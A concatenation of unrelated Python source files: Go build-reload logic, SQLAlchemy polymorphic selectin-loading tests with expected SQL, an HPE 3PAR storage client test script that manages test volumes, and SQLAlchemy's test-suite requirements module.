self._module_configuration.application_root)
self._extras_hash, old_extras_hash = (self._get_extras_hash(),
self._extras_hash)
if (self._go_executable and
self._go_file_to_mtime == old_go_file_to_mtime and
self._extras_hash == old_extras_hash):
return
if self._go_file_to_mtime != old_go_file_to_mtime:
logging.debug('Rebuilding Go application due to source modification')
elif self._extras_hash != old_extras_hash:
logging.debug('Rebuilding Go application due to GOPATH modification')
else:
logging.debug('Building Go application')
self._build()
|
|
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import backref
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectin_polymorphic
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import with_polymorphic
from sqlalchemy.sql.selectable import LABEL_STYLE_TABLENAME_PLUS_COL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.assertsql import AllOf
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.assertsql import EachOf
from sqlalchemy.testing.assertsql import Or
from sqlalchemy.testing.fixtures import fixture_session
from ._poly_fixtures import _Polymorphic
from ._poly_fixtures import Company
from ._poly_fixtures import Engineer
from ._poly_fixtures import GeometryFixtureBase
from ._poly_fixtures import Manager
from ._poly_fixtures import Person
class BaseAndSubFixture(object):
use_options = False
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
adata = Column(String(50))
bs = relationship("B")
type = Column(String(50))
__mapper_args__ = {
"polymorphic_on": type,
"polymorphic_identity": "a",
}
class ASub(A):
__tablename__ = "asub"
id = Column(ForeignKey("a.id"), primary_key=True)
asubdata = Column(String(50))
cs = relationship("C")
if cls.use_options:
__mapper_args__ = {"polymorphic_identity": "asub"}
else:
__mapper_args__ = {
"polymorphic_load": "selectin",
"polymorphic_identity": "asub",
}
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
a_id = Column(ForeignKey("a.id"))
class C(Base):
__tablename__ = "c"
id = Column(Integer, primary_key=True)
a_sub_id = Column(ForeignKey("asub.id"))
@classmethod
def insert_data(cls, connection):
A, B, ASub, C = cls.classes("A", "B", "ASub", "C")
s = Session(connection)
s.add(A(id=1, adata="adata", bs=[B(), B()]))
s.add(
ASub(
id=2,
adata="adata",
asubdata="asubdata",
bs=[B(), B()],
cs=[C(), C()],
)
)
s.commit()
def _run_query(self, q):
ASub = self.classes.ASub
for a in q:
a.bs
if isinstance(a, ASub):
a.cs
def _assert_all_selectin(self, q):
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.id AS a_id, a.adata AS a_adata, "
"a.type AS a_type FROM a ORDER BY a.id",
{},
),
AllOf(
EachOf(
CompiledSQL(
"SELECT asub.id AS asub_id, a.id AS a_id, "
"a.type AS a_type, "
"asub.asubdata AS asub_asubdata FROM a JOIN asub "
"ON a.id = asub.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
{"primary_keys": [2]},
),
CompiledSQL(
# note this links c.a_sub_id to a.id, even though
# primaryjoin is to asub.id. this is because the
# cols a.id / asub.id are listed in the mapper's
# equivalent_columns so they are guaranteed to store
# the same value.
"SELECT c.a_sub_id AS c_a_sub_id, "
"c.id AS c_id "
"FROM c WHERE c.a_sub_id "
"IN ([POSTCOMPILE_primary_keys])",
{"primary_keys": [2]},
),
),
CompiledSQL(
"SELECT b.a_id AS b_a_id, b.id AS b_id FROM b "
"WHERE b.a_id IN ([POSTCOMPILE_primary_keys])",
{"primary_keys": [1, 2]},
),
),
)
self.assert_sql_execution(testing.db, lambda: self._run_query(result))
class LoadBaseAndSubWEagerRelOpt(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = True
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(
selectin_polymorphic(A, [ASub]),
selectinload(ASub.cs),
selectinload(A.bs),
)
)
self._assert_all_selectin(q)
class LoadBaseAndSubWEagerRelMapped(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = False
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(selectinload(ASub.cs), selectinload(A.bs))
)
self._assert_all_selectin(q)
class FixtureLoadTest(_Polymorphic, testing.AssertsExecutionResults):
def test_person_selectin_subclasses(self):
s = fixture_session()
q = s.query(Person).options(
selectin_polymorphic(Person, [Engineer, Manager])
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, "
"people.type AS people_type FROM people",
{},
),
AllOf(
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
),
)
eq_(result, self.all_employees)
def test_load_company_plus_employees(self):
s = fixture_session()
q = (
s.query(Company)
.options(
selectinload(Company.employees).selectin_polymorphic(
[Engineer, Manager]
)
)
.order_by(Company.company_id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT companies.company_id AS companies_company_id, "
"companies.name AS companies_name FROM companies "
"ORDER BY companies.company_id",
{},
),
CompiledSQL(
"SELECT people.company_id AS people_company_id, "
"people.person_id AS people_person_id, "
"people.name AS people_name, people.type AS people_type "
"FROM people WHERE people.company_id "
"IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2]},
),
AllOf(
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
),
)
eq_(result, [self.c1, self.c2])
class TestGeometries(GeometryFixtureBase):
def test_threelevel_selectin_to_inline_mapped(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {"polymorphic_load": "selectin"},
"c": {
"subclasses": {
"d": {
"polymorphic_load": "inline",
"single": True,
},
"e": {
"polymorphic_load": "inline",
"single": True,
},
},
"polymorphic_load": "selectin",
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
q = sess.query(a)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, "
"c.d_data AS c_d_data, c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {
"subclasses": {
"d": {"single": True},
"e": {"single": True},
}
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
c_alias = with_polymorphic(c, (d, e))
q = sess.query(a).options(selectin_polymorphic(a, [b, c_alias]))
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.d_data AS c_d_data, "
"c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_awkward_alias_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {"subclasses": {"d": {}, "e": {}}},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
from sqlalchemy import select
a_table, c_table, d_table, e_table = self.tables("a", "c", "d", "e")
poly = (
select(a_table.c.id, a_table.c.type, c_table, d_table, e_table)
.select_from(
a_table.join(c_table).outerjoin(d_table).outerjoin(e_table)
)
.set_label_style(LABEL_STYLE_TABLENAME_PLUS_COL)
.alias("poly")
)
c_alias = with_polymorphic(c, (d, e), poly)
q = (
sess.query(a)
.options(selectin_polymorphic(a, [b, c_alias]))
.order_by(a.id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a ORDER BY a.id",
{},
),
Or(
# here, the test is that the adaptation of "a" takes place
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, "
"c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, "
"e.id AS e_id, e.e_data AS e_e_data FROM a JOIN c "
"ON a.id = c.id LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
"poly.a_id AS poly_a_id, poly.c_c_data AS poly_c_c_data, "
"poly.d_id AS poly_d_id, poly.d_d_data AS poly_d_d_data, "
"poly.e_id AS poly_e_id, poly.e_e_data AS poly_e_e_data "
"FROM (SELECT a.id AS a_id, a.type AS a_type, "
"c.id AS c_id, c.c_data AS c_c_data, d.id AS d_id, "
"d.d_data AS d_d_data, e.id AS e_id, "
"e.e_data AS e_e_data FROM a JOIN c ON a.id = c.id "
"LEFT OUTER JOIN d ON c.id = d.id "
"LEFT OUTER JOIN e ON c.id = e.id) AS poly "
"WHERE poly.a_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY poly.a_id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_partial_load_no_invoke_eagers(self):
# test issue #4199
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"a1": {"polymorphic_load": "selectin"},
"a2": {"polymorphic_load": "selectin"},
}
}
}
)
a, a1, a2 = self.classes("a", "a1", "a2")
sess = fixture_session()
a1_obj = a1()
a2_obj = a2()
sess.add_all([a1_obj, a2_obj])
del a2_obj
sess.flush()
sess.expire_all()
        # _with_invoke_all_eagers(False), used by the lazy loader
        # strategy, will cause one less state to be present, so the
        # poly loader won't locate a state limited to the "a1" mapper;
        # this exercises its check that it actually has states to load
sess.query(a)._with_invoke_all_eagers(False).all()
class LoaderOptionsTest(
fixtures.DeclarativeMappedTest, testing.AssertsExecutionResults
):
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class Parent(fixtures.ComparableEntity, Base):
__tablename__ = "parent"
id = Column(Integer, primary_key=True)
class Child(fixtures.ComparableEntity, Base):
__tablename__ = "child"
id = Column(Integer, primary_key=True)
parent_id = Column(Integer, ForeignKey("parent.id"))
parent = relationship("Parent", backref=backref("children"))
type = Column(String(50), nullable=False)
__mapper_args__ = {"polymorphic_on": type}
class ChildSubclass1(Child):
__tablename__ = "child_subclass1"
id = Column(Integer, ForeignKey("child.id"), primary_key=True)
__mapper_args__ = {
"polymorphic_identity": "subclass1",
"polymorphic_load": "selectin",
}
class Other(fixtures.ComparableEntity, Base):
__tablename__ = "other"
id = Column(Integer, primary_key=True)
child_subclass_id = Column(
Integer, ForeignKey("child_subclass1.id")
)
child_subclass = relationship(
"ChildSubclass1", backref=backref("others")
)
@classmethod
def insert_data(cls, connection):
Parent, ChildSubclass1, Other = cls.classes(
"Parent", "ChildSubclass1", "Other"
)
session = Session(connection)
parent = Parent(id=1)
subclass1 = ChildSubclass1(id=1, parent=parent)
other = Other(id=1, child_subclass=subclass1)
session.add_all([parent, subclass1, other])
session.commit()
def test_options_dont_pollute_baked(self):
self._test_options_dont_pollute(True)
def test_options_dont_pollute_unbaked(self):
self._test_options_dont_pollute(False)
def _test_options_dont_pollute(self, enable_baked):
Parent, ChildSubclass1, Other = self.classes(
"Parent", "ChildSubclass1", "Other"
)
session = fixture_session(enable_baked_queries=enable_baked)
def no_opt():
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1))
)
return self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id "
"FROM parent "
"LEFT OUTER JOIN (SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child "
"LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"WHERE child.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
q = session.query(Parent).options(
joinedload(Parent.children.of_type(ChildSubclass1)).joinedload(
ChildSubclass1.others
)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT parent.id AS parent_id, "
"anon_1.child_id AS anon_1_child_id, "
"anon_1.child_parent_id AS anon_1_child_parent_id, "
"anon_1.child_type AS anon_1_child_type, "
"anon_1.child_subclass1_id AS anon_1_child_subclass1_id, "
"other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM parent LEFT OUTER JOIN "
"(SELECT child.id AS child_id, "
"child.parent_id AS child_parent_id, "
"child.type AS child_type, "
"child_subclass1.id AS child_subclass1_id "
"FROM child LEFT OUTER JOIN child_subclass1 "
"ON child.id = child_subclass1.id) AS anon_1 "
"ON parent.id = anon_1.child_parent_id "
"LEFT OUTER JOIN other AS other_1 "
"ON anon_1.child_subclass1_id = other_1.child_subclass_id",
{},
),
CompiledSQL(
"SELECT child_subclass1.id AS child_subclass1_id, "
"child.id AS child_id, child.parent_id AS child_parent_id, "
"child.type AS child_type, other_1.id AS other_1_id, "
"other_1.child_subclass_id AS other_1_child_subclass_id "
"FROM child JOIN child_subclass1 "
"ON child.id = child_subclass1.id "
"LEFT OUTER JOIN other AS other_1 "
"ON child_subclass1.id = other_1.child_subclass_id "
"WHERE child.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY child.id",
[{"primary_keys": [1]}],
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
session.expunge_all()
result = no_opt()
with self.assert_statement_count(testing.db, 1):
eq_(result, [Parent(children=[ChildSubclass1(others=[Other()])])])
|
|
import argparse
import os
import pprint
import sys
# This is a hack to get the hpe driver module
# and its utils module on the search path.
cmd_folder = os.path.realpath(os.path.abspath(".."))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
from hpe3parclient import client, exceptions
parser = argparse.ArgumentParser()
parser.add_argument("-debug", help="Turn on http debugging", default=False, action="store_true")
args = parser.parse_args()
username = "admin"
password = "hpe"
testVolName = "WALTTESTVOL"
testSNAPName = testVolName+"SNAP"
testCPGName = "WALTTESTCPG"
#cl = client.HPE3ParClient("https://localhost:8080/api/v1")
cl = client.HPE3ParClient("https://10.10.20.242:8080/api/v1")
if "debug" in args and args.debug == True:
cl.debug_rest(True)
def get_volumes():
print("Get Volumes")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
print("Found '%s'" % volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def get_hosts():
print("Get Hosts")
try:
hosts = cl.getHosts()
if hosts:
for host in hosts['members']:
pprint.pprint(host)
# print "Found '%s'" % host['name']
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_host(hostname):
try:
host = cl.getHost(hostname)
pprint.pprint(host)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_vluns():
print("Get VLUNs")
try:
vluns = cl.getVLUNs()
if vluns:
pprint.pprint(vluns)
for vlun in vluns['members']:
print("Found CPG '%s'" % vlun['volumeName'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_vlun(vlunname):
try:
vlun = cl.getVLUN(vlunname)
pprint.pprint(vlun)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def get_cpgs():
print("Get CPGs")
try:
cpgs = cl.getCPGs()
if cpgs:
for cpg in cpgs['members']:
print("Found CPG '%s'" % cpg['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
def create_test_host():
hostname = "WALT_TEST_HOST2"
try:
host = cl.getHost(hostname)
print("host already exists")
except exceptions.HTTPNotFound as ex:
cl.createHost(hostname, {'domain':'WALT_TEST'})
pass
except exceptions.HTTPUnauthorized as ex:
print("You must login")
except Exception as ex:
print(ex)
def delete_test_host():
try:
cl.deleteHost("WALT_TEST_HOST2")
except exceptions.HTTPUnauthorized as ex:
print("You must login")
except Exception as ex:
print(ex)
def create_test_cpg():
try:
cl.createCPG(testCPGName, {'domain':'WALT_TEST', 'LDLayout' : {'RAIDType' : 1}})
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except exceptions.HTTPConflict as ex:
# the cpg already exists.
pass
except Exception as ex:
pprint.pprint(ex)
return
def delete_test_cpg():
try:
cl.deleteCPG(testCPGName)
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except exceptions.HTTPConflict as ex:
        # the cpg could not be deleted (e.g. it still has volumes).
pass
except Exception as ex:
pprint.pprint(ex)
return
def create_volumes():
print("Create Volumes")
try:
volName = "%s1" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 300)
volName = "%s2" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 1024,
{'comment': 'something', 'tpvv': True})
except exceptions.HTTPUnauthorized as ex:
pprint.pprint("You must login first")
except Exception as ex:
print(ex)
try:
volume = cl.createVolume("%s1" % testVolName, testCPGName, 2048)
except exceptions.HTTPConflict as ex:
print("Got Expected Exception %s" % ex)
pass
print("Complete\n")
def create_snapshots():
print("Create Snapshots")
try:
volName = "%s11" % testVolName
print("Creating Volume '%s'" % volName)
cl.createVolume(volName, testCPGName, 100, {'snapCPG': testCPGName})
volume = cl.getVolume(volName)
snapName = "%s1" % testSNAPName
print("Creating Snapshot '%s'" % snapName)
cl.createSnapshot(snapName, volName,
{'readOnly' : True, 'comment': "Some comment",
# {'comment': "Some comment",
'retentionHours' : 1,
'expirationHours' : 2})
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def delete_snapshots():
print("Delete Snapshots")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
if volume['name'].startswith(testSNAPName):
print("Deleting volume '%s'" % volume['name'])
cl.deleteVolume(volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
def delete_volumes():
print("Delete Volumes")
try:
volumes = cl.getVolumes()
if volumes:
for volume in volumes['members']:
if volume['name'].startswith(testVolName):
print("Deleting volume '%s'" % volume['name'])
cl.deleteVolume(volume['name'])
except exceptions.HTTPUnauthorized as ex:
print("You must login first")
except Exception as ex:
print(ex)
print("Complete\n")
#cl.login(username, password, {'InServ':'10.10.22.241'})
cl.login(username, password)
#get_cpgs()
#create_test_host()
#get_hosts()
#get_host('manualkvmtest')
#get_vluns()
#get_vlun('WALTTESTVOL11')
#delete_test_host()
#get_hosts()
#get_volumes()
#create_test_cpg()
#create_volumes()
#delete_volumes()
#create_snapshots()
#delete_snapshots()
#delete_test_cpg()
opts = {'online': True}
ret = cl.copyVolume('osv-FOOBAR', 'walt-vv', 'OpenStackCPG_RAID0_FC', opts)
pprint.pprint("Return %s" % ret)
#cl.stopPhysicalCopy('walt-vv')
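# Editor's sketch (not part of the original script): the calls above assume a
# logged-in session and never clean it up.  A minimal wrapper, assuming
# HPE3ParClient.logout() is available as in hpe3parclient; the function name
# below is illustrative only.
def _run_session_example(func):
    cl.login(username, password)
    try:
        return func()
    finally:
        cl.logout()
# Hypothetical usage:
# _run_session_example(get_volumes)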
|
|
# testing/requirements.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Global database feature support policy.
Provides decorators to mark tests requiring specific feature support from the
target database.
External dialect test suites should subclass SuiteRequirements
to provide specific inclusion/exclusions.
"""
import sys
from . import exclusions
from .. import util
class Requirements(object):
pass
class SuiteRequirements(Requirements):
@property
def create_table(self):
"""target platform can emit basic CreateTable DDL."""
return exclusions.open()
@property
def drop_table(self):
"""target platform can emit basic DropTable DDL."""
return exclusions.open()
@property
def foreign_keys(self):
"""Target database must support foreign keys."""
return exclusions.open()
@property
def on_update_cascade(self):
""""target database must support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.open()
@property
def non_updating_cascade(self):
"""target database must *not* support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.closed()
@property
def deferrable_fks(self):
return exclusions.closed()
@property
def on_update_or_deferrable_fks(self):
# TODO: exclusions should be composable,
# somehow only_if([x, y]) isn't working here, negation/conjunctions
# getting confused.
return exclusions.only_if(
lambda: self.on_update_cascade.enabled or
self.deferrable_fks.enabled
)
@property
def self_referential_foreign_keys(self):
"""Target database must support self-referential foreign keys."""
return exclusions.open()
@property
def foreign_key_ddl(self):
"""Target database must support the DDL phrases for FOREIGN KEY."""
return exclusions.open()
@property
def named_constraints(self):
"""target database must support names for constraints."""
return exclusions.open()
@property
def subqueries(self):
"""Target database must support subqueries."""
return exclusions.open()
@property
def offset(self):
"""target database can render OFFSET, or an equivalent, in a
SELECT.
"""
return exclusions.open()
@property
def bound_limit_offset(self):
"""target database can render LIMIT and/or OFFSET using a bound
parameter
"""
return exclusions.open()
@property
def parens_in_union_contained_select_w_limit_offset(self):
"""Target database must support parenthesized SELECT in UNION
when LIMIT/OFFSET is specifically present.
E.g. (SELECT ...) UNION (SELECT ..)
This is known to fail on SQLite.
"""
return exclusions.open()
@property
def parens_in_union_contained_select_wo_limit_offset(self):
"""Target database must support parenthesized SELECT in UNION
when OFFSET/LIMIT is specifically not present.
E.g. (SELECT ... LIMIT ..) UNION (SELECT .. OFFSET ..)
This is known to fail on SQLite. It also fails on Oracle
because without LIMIT/OFFSET, there is currently no step that
creates an additional subquery.
"""
return exclusions.open()
@property
def boolean_col_expressions(self):
"""Target database must support boolean expressions as columns"""
return exclusions.closed()
@property
def nullsordering(self):
"""Target backends that support nulls ordering."""
return exclusions.closed()
@property
def standalone_binds(self):
"""target database/driver supports bound parameters as column expressions
without being in the context of a typed column.
"""
return exclusions.closed()
@property
def intersect(self):
"""Target database must support INTERSECT or equivalent."""
return exclusions.closed()
@property
def except_(self):
"""Target database must support EXCEPT or equivalent (i.e. MINUS)."""
return exclusions.closed()
@property
def window_functions(self):
"""Target database must support window functions."""
return exclusions.closed()
@property
def autoincrement_insert(self):
"""target platform generates new surrogate integer primary key values
when insert() is executed, excluding the pk column."""
return exclusions.open()
@property
def fetch_rows_post_commit(self):
"""target platform will allow cursor.fetchone() to proceed after a
COMMIT.
Typically this refers to an INSERT statement with RETURNING which
is invoked within "autocommit". If the row can be returned
after the autocommit, then this rule can be open.
"""
return exclusions.open()
@property
def empty_inserts(self):
"""target platform supports INSERT with no values, i.e.
INSERT DEFAULT VALUES or equivalent."""
return exclusions.only_if(
lambda config: config.db.dialect.supports_empty_insert or
config.db.dialect.supports_default_values,
"empty inserts not supported"
)
@property
def insert_from_select(self):
"""target platform supports INSERT from a SELECT."""
return exclusions.open()
@property
def returning(self):
"""target platform supports RETURNING."""
return exclusions.only_if(
lambda config: config.db.dialect.implicit_returning,
"%(database)s %(does_support)s 'returning'"
)
@property
def duplicate_names_in_cursor_description(self):
"""target platform supports a SELECT statement that has
the same name repeated more than once in the columns list."""
return exclusions.open()
@property
def denormalized_names(self):
"""Target database must have 'denormalized', i.e.
UPPERCASE as case insensitive names."""
return exclusions.skip_if(
lambda config: not config.db.dialect.requires_name_normalize,
"Backend does not require denormalized names."
)
@property
def multivalues_inserts(self):
"""target database must support multiple VALUES clauses in an
INSERT statement."""
return exclusions.skip_if(
lambda config: not config.db.dialect.supports_multivalues_insert,
"Backend does not support multirow inserts."
)
@property
def implements_get_lastrowid(self):
""""target dialect implements the executioncontext.get_lastrowid()
method without reliance on RETURNING.
"""
return exclusions.open()
@property
def emulated_lastrowid(self):
""""target dialect retrieves cursor.lastrowid, or fetches
from a database-side function after an insert() construct executes,
within the get_lastrowid() method.
Only dialects that "pre-execute", or need RETURNING to get last
inserted id, would return closed/fail/skip for this.
"""
return exclusions.closed()
@property
def dbapi_lastrowid(self):
""""target platform includes a 'lastrowid' accessor on the DBAPI
cursor object.
"""
return exclusions.closed()
@property
def views(self):
"""Target database must support VIEWs."""
return exclusions.closed()
@property
def schemas(self):
"""Target database must support external schemas, and have one
named 'test_schema'."""
return exclusions.closed()
@property
def sequences(self):
"""Target database must support SEQUENCEs."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences
], "no sequence support")
@property
def sequences_optional(self):
"""Target database supports sequences, but also optionally
as a means of generating new PK values."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences and
config.db.dialect.sequences_optional
], "no sequence support, or sequences not optional")
@property
def reflects_pk_names(self):
return exclusions.closed()
@property
def table_reflection(self):
return exclusions.open()
@property
def view_column_reflection(self):
"""target database must support retrieval of the columns in a view,
similarly to how a table is inspected.
This does not include the full CREATE VIEW definition.
"""
return self.views
@property
def view_reflection(self):
"""target database must support inspection of the full CREATE VIEW definition.
"""
return self.views
@property
def schema_reflection(self):
return self.schemas
@property
def primary_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_option_reflection(self):
return exclusions.closed()
@property
def temp_table_reflection(self):
return exclusions.open()
@property
def temp_table_names(self):
"""target dialect supports listing of temporary table names"""
